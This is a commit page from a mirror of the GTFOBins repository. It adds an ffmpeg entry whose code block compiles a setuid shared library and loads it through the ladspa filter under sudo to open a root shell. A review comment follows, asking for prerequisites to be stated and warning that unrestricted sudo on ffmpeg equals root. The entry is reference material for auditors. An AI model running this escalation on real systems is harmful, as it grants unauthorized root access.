mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2025-12-27 18:51:41 +01:00

Merge 4f594274ca5bbe56ec045c028712c787ae30d6a0 into b29f2cfde1c72e4ea5191e49604e923bbda98461

Frissi0n 2025-09-23 18:36:51 -05:00 committed by GitHub
commit 90960c8ea4
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

10
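--- a/_gtfobins/ffmpeg.md
+++ b/_gtfobins/ffmpeg.md
@@ -0,0 +1,10 @@
+---
+functions:
+sudo:
+- description: The ladspa filter loads external plugins for audio processing. Load a malicious shared library to execute code and get a shell.
+code: |
+TD=$(mktemp -d)
+printf "\x52\x49\x46\x46\x24\x00\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x22\x56\x00\x00\x01\x00\x08\x00\x64\x61\x74\x61\x00\x00\x00\x00" > "$TD/any.wav"
+echo -e '#include <unistd.h>\n#include <stdlib.h>\n__attribute__((constructor)) static void setup(void) {\nsetgid(0);\nsetuid(0);\nsystem("/bin/sh -c reset");\nsystem("/bin/sh");\n}' | gcc -x c -shared -fPIC -o $TD/libgtfo.so -
+sudo ffmpeg -i $TD/any.wav -af "ladspa=file=$TD/libgtfo.so" -f null a.wav
+---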
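Review bot: The `description:` line does not say what the entry depends on, so a reader assessing their own exposure cannot tell when it applies. The `code` block needs `gcc` on the host and an ffmpeg build that includes the `ladspa` filter, which upstream only compiles in when configured with `--enable-ladspa`; I would add a sentence such as `Requires an ffmpeg build with the ladspa filter and a compiler on the host.` The description should also state the takeaway the snippet demonstrates: the filter's `file=` option is given a caller-chosen path, so a sudoers rule that allows `ffmpeg` with unrestricted arguments is effectively a grant of root. As a style point, `$TD` is quoted on the `printf` line but left unquoted in the `gcc -o` and `ffmpeg -i` arguments; quote it consistently.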